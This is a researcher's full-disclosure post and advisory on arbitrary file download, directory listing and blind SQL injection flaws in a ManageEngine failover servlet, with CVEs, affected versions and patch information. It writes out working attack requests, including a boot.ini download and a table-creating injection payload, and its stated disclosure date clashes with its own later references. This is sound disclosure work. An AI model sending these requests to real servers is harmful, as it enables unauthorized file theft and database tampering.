Hi,

This is part 12 of the ManageOwnage series. For previous parts, see [1].

This time we have an arbitrary file download, directory content
disclosure and blind SQL injection vulnerabilities in ManageEngine
OpManager, Applications Manager and IT360.

I've pushed two new Metasploit modules into the framework that exploit
the file download and the content disclosure [2], these should
hopefully be accepted soon.
The full advisory text is below, and as always you can get a copy from
my repo [3].

Regards,
Pedro

>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 28/01/2014 / Last updated: 28/01/2014

>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure
management software that helps large enterprises, service providers
and SMEs manage their data centers and IT infrastructure efficiently
and cost effectively. Automated workflows, intelligent alerting
engines, configurable discovery rules, and extendable templates enable
IT teams to setup a 24x7 monitoring system within hours of
installation."

"ManageEngine Applications Manager is a comprehensive application
monitoring software used to monitor heterogeneous business
applications such as web applications, application servers, web
servers, databases, network services, systems, virtual systems, cloud
resources, etc. It provides remote business management to the
applications or resources in the network. It is a powerful tool for
system and network administrators, helping them monitor any number of
applications or services running in the network without much manual
effort."

"Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration."


>> Technical details:
The affected servlet is the "FailOverHelperServlet" (affectionately
called FailServlet).
There are definitely more vulnerabilities than the ones identified
below - for example it is possible to hijack the failover operation
completely. The ones listed below as the easy ones to find and
exploit.


#1
Vulnerability: Arbitrary file download
CVE-2014-7863
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5

POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini


#2
Vulnerability: Information disclosure - list all files in a directory
and its children
CVE-2014-7863 (same as #1)
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5

POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\


#3
Vulnerability: Blind SQL injection
CVE-2014-7864
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5
Constraints: unauthenticated in OpManager; authenticated in IT360
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a


>> Fix:
For Applications Manager, upgrade to version 11.9 b11912.

For OpManager, install the patch for v11.4 and 11.5:
https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet
Version 11.6 will be released with the patch.

These vulnerabilities remain UNFIXED in IT360.


[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
http://seclists.org/fulldisclosure/2014/Nov/21
http://seclists.org/fulldisclosure/2014/Dec/9
http://seclists.org/fulldisclosure/2015/Jan/2
http://seclists.org/fulldisclosure/2015/Jan/5

[2]
https://github.com/rapid7/metasploit-framework/pull/4658
https://github.com/rapid7/metasploit-framework/pull/4659

[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt